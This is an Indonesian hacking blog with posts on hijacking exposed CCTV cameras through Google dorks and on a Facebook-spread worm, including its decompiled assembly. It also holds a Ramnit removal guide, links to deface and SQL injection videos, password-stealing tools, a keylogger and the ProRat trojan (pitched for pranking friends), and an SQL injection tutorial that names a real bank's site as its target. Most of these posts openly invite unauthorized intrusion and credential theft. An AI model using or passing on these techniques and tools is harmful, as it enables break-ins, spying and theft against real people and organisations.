BELAJAR VIRUS, KOMPUTER DAN HACKER

HACKING CCTV PANASONIC

2011-12-28T12:01:00.000+07:00

HACKING CCTV PANASONIC
awalnya sih hanya iseng pingin lihat cctv online punya DLLAJ dan kepolisian. eh ternyata disitusnya bukan yg real time tetapi direkam diserver kemudian baru diupload kewebsite. nah dari situlah saya pingin langsung dapetin gambar secara real time tanpa harus masuk kesebuah website.
setelah googling sana sini dapat beberapa ip cctv yang memang sudah di publish sama yg bikin blog. cuma dipikir pikir kok cuma sedikit. jadi ga puas deh.
nah untuk lebih jelasnya simak caranya sebagai berikut :
1. ketikan di google ==> inurl:CgiStart?page=
2. biasanya google akan merespon anda dengan lalulintas komunikasi yang tidak layak. dan disuruh memasukan kata kata tertentu. kamu ikuti saja. biasanya google akan meminta 2x verifikasi kata.
3. nah tara..... setelah melewati verifikasi dari google munculah banyak pilihan. pilih aja salah satu.
4. jreng.... munculah cctv target....
5. ada beberapa yg bisa kita ambil kendali termasuk digeser kanan dan kiri, atas serta bawah. tapi jangan ketahuan admin yah... bisa di ban ip kamu.
ok sekian tutorial hacking cctv online. gunakan dengan bijak yah

VIRUS TROJAN MENYEBAR VIA CHAT FB

2011-10-04T07:51:00.000+07:00

pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?

berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.
virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
   push   ebp
   mov   ebp,esp
   sub   esp,10
   push   ebx
   push   esi
   xor   ecx,ecx
   xor   esi,esi
   push   edi
   mov   dword ptr [ebp-0C],ecx
   xor   ebx,ebx

l00401101:
   mov   eax,ecx
   cdq
   push   0F
   pop   edi
   idiv   edi
   mov   byte ptr [ecx+00417DB0],cl
   inc   ecx
   cmp   ecx,00000100
   mov   al,[edx+00416FC4]
   mov   byte ptr [ecx+004182BF],al
   jl   00401101

l00401124:
   xor   eax,eax
   mov   edi,000000FF

l0040112B:
   movzx   edx,byte ptr [eax+00417DB0]
   movzx   ecx,byte ptr [eax+004182C0]
   add   edx,ebx
   add   ecx,edx
   and   ecx,edi
   mov   ebx,ecx
   lea   ecx,[ebx+00417DB0]
   mov   dl,[ecx]
   xor   byte ptr [eax+00417DB0],dl
   mov   dl,[eax+00417DB0]
   xor   byte ptr [ecx],dl
   mov   cl,[ecx]
   xor   byte ptr [eax+00417DB0],cl
   inc   eax
   cmp   eax,00000100
   jl   0040112B

l00401167:
   mov   ebx,[ebp+08]
   push   ebx
   call   dword ptr [0041300C]
   xor   eax,eax
   cmp   byte ptr [ebx],al
   mov   dword ptr [ebp-04],eax
   jz   00401185

l0040117A:
   inc   dword ptr [ebp-04]
   mov   ecx,[ebp-04]
   cmp   byte ptr [ecx+ebx],al
   jnz   0040117A

l00401185:
   cmp   dword ptr [ebp-04],eax
   mov   dword ptr [ebp-08],eax
   jle   004012EF

l00401191:
   inc   bx
   mov   eax,eax
   or   bx,ax
   dec   bl
   ror   cl,1C
   dec   eax
   sub   cx,ax
   sub   eax,00
   inc   eax
   xor   eax,ebx
   not   bl
   neg   bx
   inc   ebx
   mov   bx,bx
   xor   cl,al
   sub   eax,ecx
   xor   bl,F6
   nop
   inc   esi
   and   esi,edi
   movzx   eax,byte ptr [esi+00417DB0]
   add   eax,[ebp-0C]
   and   eax,edi
   mov   dword ptr [ebp-0C],eax
   lea   eax,[eax+00417DB0]
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   mov   cl,[esi+00417DB0]
   xor   byte ptr [eax],cl
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   movzx   eax,byte ptr [eax]
   movzx   ecx,byte ptr [esi+00417DB0]
   add   eax,ecx
   mov   ecx,[ebp+08]
   and   eax,edi
   mov   dl,[eax+00417DB0]
   mov   eax,[ebp-08]
   add   eax,ecx
   cmp   dl,[eax]
   mov   byte ptr [00417A71],dl
   mov   dword ptr [ebp-10],eax
   jnz   00401219

l00401211:
   xor   dl,dl
   mov   byte ptr [00417A71],dl

l00401219:
   ror   bx,19
   not   eax
   sub   al,00
   or   bx,ax
   not   ecx
   and   al,bl
   sub   bx,1B
   ror   cx,1B
   add   ax,cx
   ror   ecx,10
   and   cx,FF
   add   eax,000000B2
   neg   ecx
   xor   al,cl
   or   bl,1D
   shl   bl,12
   sar   bl,14
   and   ax,FFFF
   and   eax,ecx
   not   eax
   dec   ebx
   or   eax,ecx
   not   cl
   ror   bx,02
   shl   ebx,03
   or   eax,00
   shl   bl,1B
   ror   bl,0D
   sub   al,00
   xor   cx,ax
   ror   ecx,1C
   or   eax,00
   add   al,00
   not   ecx
   inc   cl
   not   bx
   inc   bx
   sar   bl,17
   ror   cl,04
   nop
   ror   cx,05
   and   ecx,09
   ror   ebx,15
   xor   bl,cl
   inc   ecx
   sub   eax,00
   shl   cx,06
   and   bl,al
   inc   bx
   or   bx,00
   inc   eax
   ror   bl,10
   shl   bx,1B
   and   cx,0D
   shl   bx,04
   shl   cl,1A
   and   ecx,eax
   neg   bl
   nop
   inc   ebx
   and   bl,FF
   sar   cx,13
   ror   bl,09
   sub   eax,ebx
   ror   ebx,19
   add   eax,3F
   not   bx
   shl   ax,13
   dec   bx
   add   al,cl
   mov   eax,[ebp-10]
   xor   byte ptr [eax],dl
   inc   dword ptr [ebp-08]
   mov   eax,[ebp-08]
   cmp   eax,[ebp-04]
   jl   00401191

l004012EC:
   mov   ebx,[ebp+08]

l004012EF:
   pop   edi
   pop   esi
   mov   eax,ebx
   pop   ebx
   leave
   ret

fn004012F6()
   mov   eax,[004183CC]
   push   00416D64
   push   eax
   call   dword ptr [00413014]
   push   40
   push   00003000
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040131D()
   push   00416D40
   push   dword ptr [esp+10]
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn00401337()
   mov   eax,[004183CC]
   push   00416FD4
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+0C]
   xor   ecx,ecx
   push   dword ptr [esp+0C]
   mov   dword ptr [004183D0],eax
   push   ecx
   push   ecx
   push   04
   push   ecx
   push   ecx
   push   ecx
   push   dword ptr [esp+24]
   push   ecx
   call   eax
   ret

fn00401366()
   mov   eax,[004183CC]
   push   00416D88
   push   eax
   call   dword ptr [00413014]
   push   00
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040138C()
   mov   eax,[004183CC]
   push   00416DAC
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013A8()
   mov   eax,[004183CC]
   push   00416DD0
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013C4()
   mov   edx,[004183CC]
   push   ebx
   dec   cl
   inc   bx
   or   bx,16
   shl   cx,15
   neg   ecx
   or   ax,bx
   sub   bl,DE
   not   ecx
   ror   cl,16
   shl   ax,1A
   shl   cx,0B
   or   eax,04
   inc   ebx
   or   eax,ebx
   and   eax,FF
   inc   cx
   sar   al,07
   sub   bl,cl
   ror   al,18
   and   bx,14
   sub   eax,00
   shl   bx,0B
   and   bl,06
   add   ebx,ecx
   and   bx,FF
   or   al,cl
   push   00416F38
   push   edx
   call   dword ptr [00413014]
   mov   edx,eax
   not   ebx
   neg   eax
   add   bx,00
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   sub   eax,07
   and   ecx,ebx
   nop
   shl   al,16
   ror   eax,12
   sub   cl,02
   ror   bl,05
   ror   eax,02
   or   bx,02
   sub   bx,00
   sar   ebx,07
   neg   eax
   xor   eax,66
   ror   cl,1C
   neg   eax
   inc   cl
   dec   ecx
   inc   eax
   and   bl,cl
   ror   eax,0F
   mov   bl,bl
   nop
   shl   eax,16
   neg   cl
   inc   bl
   not   eax
   add   ebx,3F
   ror   ecx,08
   sub   al,00
   nop
   shl   ecx,09
   sar   bx,1A
   ror   bl,0F
   and   ecx,06
   not   cl
   ror   eax,08
   not   bl
   shl   eax,04
   ror   al,0E
   sub   bl,E7
   add   cx,62
   or   ecx,ebx
   ror   eax,02
   and   ebx,18
   xor   ecx,000000E0
   or   ax,bx
   shl   bl,10
   xor   eax,0000009A
   sar   ecx,13
   neg   ebx
   ror   bx,18
   neg   al
   ror   ebx,1C
   neg   ax
   push   dword ptr [esp+08]
   call   edx
   pop   ebx
   ret

fn004014DE()
   push   ecx
   push   ebx
   push   ebp
   push   esi
   push   edi
   mov   edi,eax
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   push   00416FD4
   call   004010EF
   pop   ecx
   add   bl,al
   neg   eax
   xor   cl,al
   sub   bx,00
   shl   al,14
   not   cx
   mov   eax,eax
   or   ecx,ebx
   ror   bl,1E
   sub   al,cl
   xor   ecx,ebx
   sar   al,0F
   sub   bx,0E
   or   bx,01
   neg   ax
   not   ebx
   neg   eax
   add   bx,00
   push   00416D40
   call   004010EF
   pop   ecx
   ror   bl,0B
   and   eax,11
   push   00416D64
   call   004010EF
   pop   ecx
   inc   ebx
   dec   bl
   nop
   not   ebx
   dec   eax
   neg   eax
   add   eax,00
   and   eax,FF
   and   bx,14
   add   eax,ecx
   sub   ebx,00
   or   eax,00
   neg   cx
   or   ax,001A
   mov   bl,bl
   xor   eax,0000009E
   inc   cl
   push   00416D88
   call   004010EF
   pop   ecx
   and   cl,bl
   add   bl,91
   shl   ebx,14
   sub   ecx,00
   xor   ebx,ecx
   ror   al,01
   neg   bl
   shl   ax,1B
   ror   bx,02
   dec   bl
   ror   bl,17
   or   eax,14
   sub   al,00
   ror   ebx,09
   neg   eax
   not   bl
   xor   al,cl
   shl   eax,0E
   push   00416DAC
   call   004010EF
   pop   ecx
   not   cx
   sar   bl,01
   dec   cl
   dec   al
   ror   ecx,0F
   or   bl,cl
   add   cl,00
   ror   ecx,07
   inc   ebx
   not   eax
   sub   cx,bx
   dec   eax
   sub   eax,00
   neg   eax
   sub   cl,00
   or   bl,00
   shl   ebx,13
   sub   ax,bx
   not   ebx
   inc   bx
   and   al,bl
   mov   bx,bx
   neg   ecx
   sub   bx,cx
   push   00416DD0
   call   004010EF
   mov   dword ptr [esp],00416DF4
   call   004010EF
   mov   ebp,00416F5C
   push   ebp
   call   004010EF
   mov   esi,[00413018]
   pop   ecx
   pop   ecx
   push   00416CB0
   call   esi
   push   00416D1C
   mov   dword ptr [004183CC],eax
   call   esi
   mov   dword ptr [esp+10],eax
   and   ax,0001
   sar   bx,14
   shl   al,09
   ror   ecx,0B
   or   bl,00
   dec   bx
   add   ebx,ecx
   neg   eax
   ror   bl,17
   not   al
   or   cx,00
   dec   ax
   ror   bl,0E
   inc   al
   push   ebp
   push   dword ptr [004183CC]
   call   dword ptr [00413014]
   mov   dword ptr [00417D68],00000044
   mov   dword ptr [00417A90],00010007
   cmp   word ptr [edi],5A4D
   mov   dword ptr [004183C8],edi
   jnz   00401773

l00401698:
   mov   esi,[edi+3C]
   add   esi,edi
   cmp   dword ptr [esi],00004550
   jnz   00401773

l004016A9:
   push   00417EB0
   push   00417D68
   call   eax
   push   eax
   call   00401337
   push   dword ptr [esp+1C]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   0040131D
   push   dword ptr [esi+50]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   004012F6
   push   dword ptr [esi+54]
   push   edi
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   00401366
   xor   ebp,ebp
   add   esp,34
   xor   ebx,ebx
   cmp   word ptr [esi+06],bp
   jbe   0040173D

l004016FD:
   mov   eax,[004183C8]
   mov   eax,[eax+3C]
   add   eax,ebp
   lea   eax,[eax+edi+000000F8]
   push   dword ptr [eax+10]
   mov   ecx,[eax+14]
   mov   dword ptr [00417A7C],eax
   mov   eax,[eax+0C]
   add   eax,[esi+34]
   add   ecx,edi
   push   ecx
   push   eax
   push   dword ptr [00417EB0]
   call   00401366
   movzx   eax,word ptr [esi+06]
   add   esp,10
   inc   ebx
   add   ebp,28
   cmp   ebx,eax
   jl   004016FD

l0040173D:
   mov   edi,00417A90
   push   edi
   push   dword ptr [00417EB4]
   call   0040138C
   mov   eax,[esi+28]
   add   eax,[esi+34]
   push   edi
   push   dword ptr [00417EB4]
   mov   dword ptr [00417B40],eax
   call   004013A8
   push   dword ptr [00417EB4]
   call   004013C4
   add   esp,14

l00401773:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   pop   ecx
   ret

fn00401779()
   push   ebx
   push   ebp
   push   esi
   push   edi
   ror   cx,07
   shl   al,03
   push   00416CB0
   call   dword ptr [00413018]
   mov   edi,eax
   and   bl,FF
   mov   esi,[00413014]
   push   00416E3C
   push   edi
   call   esi
   mov   dword ptr [004183D4],eax
   shl   bl,15
   push   00416E60
   push   edi
   call   esi
   mov   dword ptr [004184DC],eax
   ror   bx,06
   push   00416E84
   push   edi
   call   esi
   mov   dword ptr [004184E0],eax
   mov   eax,eax
   push   00416EA8
   push   edi
   call   esi
   mov   dword ptr [004184E4],eax
   neg   ecx
   mov   eax,[004183D4]
   xor   ebp,ebp
   cmp   eax,ebp
   jz   0040184F

l004017E4:
   cmp   dword ptr [004184DC],ebp
   jz   0040184F

l004017EC:
   cmp   dword ptr [004184E0],ebp
   jz   0040184F

l004017F4:
   and   bl,al
   movzx   ecx,word ptr [esp+14]
   push   00000118
   push   ecx
   push   ebp
   call   eax
   mov   esi,eax
   add   cx,64
   cmp   esi,ebp
   jnz   00401813

l0040180E:
   shl   bl,02
   jmp   00401852

l00401813:
   add   bx,cx
   push   esi
   push   ebp
   call   dword ptr [004184E0]
   mov   edi,eax
   and   bl,07
   cmp   edi,ebp
   jnz   0040182B

l00401827:
   xor   ecx,ebx
   jmp   00401852

l0040182B:
   and   cx,ax
   push   esi
   push   ebp
   call   dword ptr [004184DC]
   mov   dword ptr [004184F8],eax
   inc   bl
   push   edi
   call   dword ptr [004184E4]
   mov   dword ptr [004184FC],eax
   and   ecx,eax
   mov   al,01
   jmp   00401854

l0040184F:
   ror   al,1D

l00401852:
   xor   al,al

l00401854:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   ret

fn00401859()
   push   ebx
   mov   ebx,[004184E8]
   push   ebp
   mov   ebp,[004184EC]
   push   esi
   push   edi
   push   00416CB0
   call   dword ptr [00413018]
   mov   esi,[00413014]
   mov   edi,eax
   push   00416ECC
   push   edi
   call   esi
   push   00416EF0
   push   edi
   mov   dword ptr [00417A88],eax
   call   esi
   push   00416F14
   push   edi
   mov   dword ptr [004183C0],eax
   call   esi
   test   ebx,ebx
   mov   dword ptr [00417DAC],eax
   push   ebp
   jz   004018B6
---------------------------------------------------------------

Hebatnya, akun Facebook yang di infeksi oleh virus tidak mengalami perubahan sama sekali. Bahkan tidak ada pop up FB Chat yang terbuka. Yang dibutuhkan oleh virus ini hanyalah akun Facebook tersebut sedang login saja. Kemungkinan besar hal ini terjadi supaya korban virus tidak menyadari kalau komputernya telah terinfeksi oleh Kolab/Click1 dan menyebarkan banyak sekali FB Chat ke kontak-kontak Facebooknya yang mengarahkan untuk mendownload virus ini.

Jika Anda meng-klik link pada pesan chat tersebut, maka secara otomatis file akan terdownload ke dalam komputer Anda. Dan jika Anda menjalankan file tersebut, maka komputer Anda sudah pasti telah terinfeksi.

Sulit dibasmi dan menyebabkan BSOD (Bumi Serpong Ooo Damai ??.. :p)

Kolab/Click1 tidak berjalan pada proses atau services Windows, sehingga sulit menemukan dan mematikan keberadaan worm/rootkit ini. Tetapi, worm ini justru mendompleng atau menumpang pada file svchost.exe milik Windows, sehingga Anda akan sulit mematikan-nya. Jika Anda memaksa mematikan file svchost.exe, komputer akan mengalami blue screen of death / BSOD. Termasuk jika Anda mencoba melakukan scan menggunakan tools tertentu seperti GMER, tools yang biasa digunakan untuk mendeteksi rootkit. (lihat gambar 6)

Gambar 6, Berusaha mematikan file svchost yang telah didompleng, akan muncul BSOD

Broadcast ke IP-IP tertentu

Walaupun tidak berjalan pada proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe Windows, untuk melakukan broadcast pada IP-IP tertentu. (lihat gambar 7)

Gambar 7, Aktivitas broadcast yang dilakukan oleh Kolab/Click1

Mencantumkan diri-nya pada Windows Firewall

Agar dapat berjalan bebas tanpa hambatan, Kolab/Click1 mendaftarkan programnya pada Windows Firewall, sehingga diperbolehkan untuk melakukan koneksi dan broadcast. (lihat gambar 8)

Gambar 8, Aktivitas broadcast yang dilakukan oleh Kolab/Click1

Tips Hindari Kolab/Click1

Berikut beberapa tips bagi Anda jika tidak ingin terinfeksi dan menjadi korban dari worm/rootkit ini

Hindari melakukan klik pada link yang dikirim pada Anda, baik melalui pesan chat FB atau status.
Beritahukan pada teman Anda, bahwa komputer tersebut telah terinfeksi virus, dan segera lakukan update dan scan komputer dengan antivirus yang terupdate.
Jangan melakukan copy link atau melakukan pemberitahuan disertai link tersebut, karena dengan begitu Anda justru ikut menyebarkan link yang mengandung virus tersebut.
Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
Gunakan Secure HTTP / HTTPS pada saat Login FB, hal ini agar FB Anda tidak mudah diakses oleh orang lain disekitar Anda.

Apa yang harus dilakukan jika sudah terlajur terinfeksi?
Apabila kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa melakukan beberapa langkah berikut:
1. Tutup akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah penyebaran lebih banyak ke teman-teman facebook kita.
2. Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
3. Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
4. Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat facebook ini merupakan varian terbaru dari worm kolab (worm jaringan) yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.
Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.

MEMBERANTAS VIRUS RAMNIT

2011-07-23T02:37:00.001+07:00

Memang Virus Ramnit adalah Virus yang sangat cepat penularannya , tetapi bagaimanapun hebatnya sesuatu pasti ada kelemahannya….

Disini saya akan menjelaskan dengan tuntas bagaimana Virus ramnit bekerja… sekaligus cara mengatasinya…

Virus Ramnit.. :

Virus yang menginjeksi file .html , .exe dan .dll
Virus yang menular melalui removable disk ( UFD ) dengan cara mengcopy file .cpl dan .exe yang selalu bertambah dan berubah-ubah namanya.Yang tepatnya file tersebut berada di dalam folder Recycler… dan 4 file shortcut copy of yang akan menjalankan file *.cpl infektor yang terdapat di folder recycler UFD.
Bila Virus tersebut telah meng-infeksi system komputer , virus tersebut akan membuat dan menjalankan file svchost.exe yang akan melakukan berbagai hal: a. membuat file bernama : watermark.exe yang bertempat di folder : C:\programfiles\mikrosoft\watermark.exe. b. merubah registry userinit.exe mejadi menjalankan : watermark.exe , sehingga virus tersebut menguasai sistem secara permanen , dengan cara menginfeksi file berekstensi .exe , . dll dan .html
Jika di properties , UFD akan terlihat banyak terpakai oleh file .cpl dan .exe di folder recycler.

Efeknya:

Virus ramnit akan membuat file program tidak berjalan dengan normal , misalnya: mozilla firefox , winamp dll
kita tidak bisa menghapus file watermark.exe yang ada difolder c:\programfiles\microsoft\watermark.exe , dikarenakan file tersebut dikunci oleh file svchost.exe-nya virus ramnit.
bila kita hapus file / folder yang ada didalam folder recycler UFD , file .cpl dan .exe akan muncul kembali.. dan terus menulis kembali…
untuk system yangtelah terinfeksi file tertentu.. misalnya : explorer.exe akan digantikan explorermgr.exe
bila kita membersihkan virus ini tidak tuntas ( ada yang belum dibersihkan ) , Virus ini akan kembali bila kita menjalankan aplikasi ( misalnya : klik kanan ).

Cara membersihkannya:

Siapkan cleaner Anti Virus ( saya menggunakan NOD32 stand alone ) dengan cara >download disini< dan simpan dalam bentuk file zip / RAR agar file exe tersebut tidak terinfeksi virus.
Simpan file tersebut di UFD atau copy paste di harddisk komputer yang telah terinfeksi.
Gunakan task manager , pilih task / tab processes dan end task semua file svchost.exe dan juga semua yang bisa di end task ( kecuali : task managernya )
Open file cleaner NOD32 yang sudah berbentuk zip /RAR , dengan menggunakan file open di task manager.Rubah pilihan program di open file menjadi allfiles agar file zip / rar dari NOD32 bisa terlihat.
setelah teropen NOD32 dengan winrar atau aplikasi lainnya.. silakan dobel klik file nod*.exe setelah next…next dipilihan action , sebelah kiri pilih Clean dan sebelah kanan pilih delete.Lalu jalankan Scan & clean
setelah berjalan close / tutup winrar / aplikasi yang dibuat membuka NOD32 zip / RAR.
Silakan diawasi dengan task manager bila ada file svchost.exe keluar / tampil di processes segera di end task… dan seperti biasa bila ada tampilan windows yang memperingatkan bahwa komputer akan shutdown dalam waktu 60 detik / 1 menit…. silakan ketik di menu file open /run : shutdown -a yang artinya -a adalah perintah shutdown untuk membatalkan aksinya…
Peringatan!!!!! , disaat NOD 32 membersihkan file di komputer anda , jangan sampai membuka / menjalankan file apapun… karena jangankan menjalankan file exe , kita klik kanan aja sudah berarti menjalankan virus / svchost.exe-nya Virus Ramnit.
Ingat… yang perlu kita jaga adalah : mematikan / end task file svchost.exe selama NOD32 membersihkan file di komputer kita…..

Antisipasi Virus RAmnit:

Untuk menjaga Virus sejenis ramnit agar tidak kembali meng-infeksi komputer kita… disini saya sertakan berbagai trik… diantaranya:

Matikan autorun.inf windows bisa berbagai macam cara : dengan menggunakan gpedit.msc>>administrative template>>turn off auto play>>enable>>alldrive , atau menggunakan regedit silakan baca : agar virus tidak masuk melalui flash disk
Rubah beberapa ektensi file yang berpotensi digunakan oleh virus dengan assosiasi file ( misalnya: assoc .vbs=txtfile ) terutama untuk Virus ramnit adalah ekstensi .cpl
Hapus selalu folder recycler didalam UFD , bila tidak bisa ada kemungkinan komputer kita terinfeksi Virus…
Dan hapus dengan menggunakan mini windows Xp ( hiren BOOt CD ) atau system berbasis linux , folder recycler dan _restore yang ada di folder systeminformation
Install Anti virus dengan Update database terbaru… dan usahakan anti viru tersebut diupdate databasenya.. baik secara online ataupu offline..

Disini saya sertakan beberapa file buatan saya yang berfungsi untuk mempermudah setting windows…

NOD32 dari:ziddu.com

SUMBER : http://mpu4elcom.net/2011/04/19/cara-membersihkan-virus-ramnit-mudah-dan-tuntas/

VIDEO HACKING

2011-06-17T10:39:00.002+07:00

ALL VIDEO HACKING

Untuk yg sdah mengenal dunia deface mungkin tutorial ni sangatlah tidak asing lagi...B Tapi bwat yang newbie mungkin ini sangat bermanfaat....silahkan disedot video'y tutor'y

---------------------------------------------------------------------

Hacking Video Tutorial - Phpmyadmin

4shared.com/file/pz7Ozrjr/phpmyadmin.html

---------------------------------------------------------------------

Hacking Video Tutorial - Cpanel Hacking

4shared.com/file/G3pXG06c/C_p4nel.html

---------------------------------------------------------------------

Hacking Video Tutorial - Brute Force

4shared.com/file/NT-NDbjs/tutoraccountBruteForce.html

---------------------------------------------------------------------

Hacking Video Tutorial - Joomla Reset Password

4shared.com/file/MIecxKVa/joomla_reset_pass.html

---------------------------------------------------------------------

Hacking Video Tutorial - RFI Metode + Patch

4shared.com/file/Ov_3yd9W/RFI_Patc.html

---------------------------------------------------------------------

Hacking Video Tutorial - LFI (Local file disclosure)

4shared.com/file/jSmkcNrR/L_F_I.html

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli + Backdoring

4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html

---------------------------------------------------------------------

Hacking Video Tutorial - Deface with HTML

4shared.com/file/hkxQik5C/DefacHTML-Injec.html

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli V.4

4shared.com/file/IBQ-RZU1/S-v4.html

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli V.5

4shared.com/Tutorial_SQL_Injection.html

---------------------------------------------------------------------

Hacking Video Tutorial - Jumping

4shared.com/file/Agmx67u5/JumP_N4ck0.html

---------------------------------------------------------------------

Hacking Video Tutorial - Metasploit

4shared.com/file/fx87EhEY/tutor_metas.html

---------------------------------------------------------------------

Hacking Video Tutorial - Rooting

4shared.com/file/Z7YF5ahj/R00tin9.html

---------------------------------------------------------------------

Hacking Video Tutorial - Asp Sql inj_TUTOR

4shared.com/file/X60x9df6/asp-sql-inj_TUTOR.html

---------------------------------------------------------------------

Hacking Video Tutorial - Scemafuzzy

4shared.com/file/FDOJKC3d/Scema.html

---------------------------------------------------------------------

Hacking Video Tutorial - Backdoring + Inject + Deface

4shared.com/file/QMSTE8zc/_2__BackInjectDef.html

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli Malingsial Version

4shared.com/file/xfy-al-Q/Malingsial.html

---------------------------------------------------------------------

Hacking Video Tutorial - Patching Joomla

4shared.com/file/a_GUfnkm/joomla_patch.html

---------------------------------------------------------------------

Hacking Video Tutorial - Defacing Tutorial

4shared.com/file/Hu4IxoNG/Defac-Tutor.html

---------------------------------------------------------------------

-----------------------------------------------------------------

PROGRAM SPY ( MATA MATA )

2011-06-17T09:56:00.004+07:00

Pernah dengar tentang program mata mata yang biasa dipakai oleh FBI dan agen rahasia lainya?

berikut ini akan saya berikan 2 buah program mata mata (spy)

1. pasword fox, program ini akan menunjukan semua jenis pasword yang terekam pada firefox. cara kerjanya yaitu anda tinggal klik file aplikasinya maka program ini akan otomatis mencari pasword dari user yang pernah menggunakan firefox tersebut. berhati hatilah jika ada teman kamu yang pinjam laptopmu. bisa jadi di flashdisknya ada program ini. karena programnya yg portabel sehingga dapat disimpan di FD dan tinggal dijalankan saja.

2. google pasword decripter, program ini juga hampir sama dengan yang diatas hanya ada 2 macam yg portabel dan non portabel.

program diatas sangat berbahaya dan saya tidak bertanggungjawab atas pemakaian oleh orang yang tidak bertanggung jawab.

saran saya jangan pernah klik remember / ingat saya pada saat anda log in di sebuah website dengan user name dan paswordnya

waspadalah...... waspadalah...... waspadalah......

download paswordfox di : http://www.ziddu.com/download/15384879/passwordfox.zip.html

download google pasword decripter di : http://www.ziddu.com/download/15384880/GooglePasswordDecryptor.zip.html

oh iya ini saya masih punya 11 tools mata mata yang biasa dipakai oleh agen FBI dan agen rahasia lainya silahkan kalian pelajari sendiri heheheheh. males jelasinya kebayakan. silahkan download di : http://www.ziddu.com/download/15384974/11FBITools.rar.html

saya tidak bertanggung jawab atas pemakaian dan penggunaan program ini. jika anda memakai berarti anda paham akan resikonya

KEYLOGER DAN ANTI KEYLOGER

2011-06-17T09:43:00.003+07:00

sudah pernah dengar keyloger ? yah program yang dapat merekam semua aktivitas yang kita lakukan. baik membuka program menulis email maupun mamasukan pasword dan program ini berjalan tanpa diketahui oleh pemilik komputer. berhati hatilah jangan sampai komputer kamu disisipi program ini karena semua rahasiamu akan terbongkarbagi yang ingin mencoba keyloger silahkan download di : http://www.ziddu.com/download/15384668/setup.exe.html

terus gimana kalo sampai kenakeylogger? kamu jangan panik ada anti keyloger namanya keyscrumbler. yang mau anti keylogger silahkan didownload :http://www.ziddu.com/download/12667956/KeyScrambler_Setup.exe.html

HACKING WITH PRORAT

2011-01-08T06:18:00.002+07:00

Bagi kamu yang suka iseng ngejahilin komputer teman, nih aku kasih tools yang cocok buat kamu. Namanya ProRat. ProRat adalah salah satu tool hacking yang sangat luar biasa sekali. Tools ini buatan orang Turkey. Tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban saja, maka kita dapat langsung menginfeksinya. Selamat mencoba
download Disini

Hack Website menggunakan SQL injection

2010-12-03T11:19:00.001+07:00

Hack Website menggunakan SQL injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
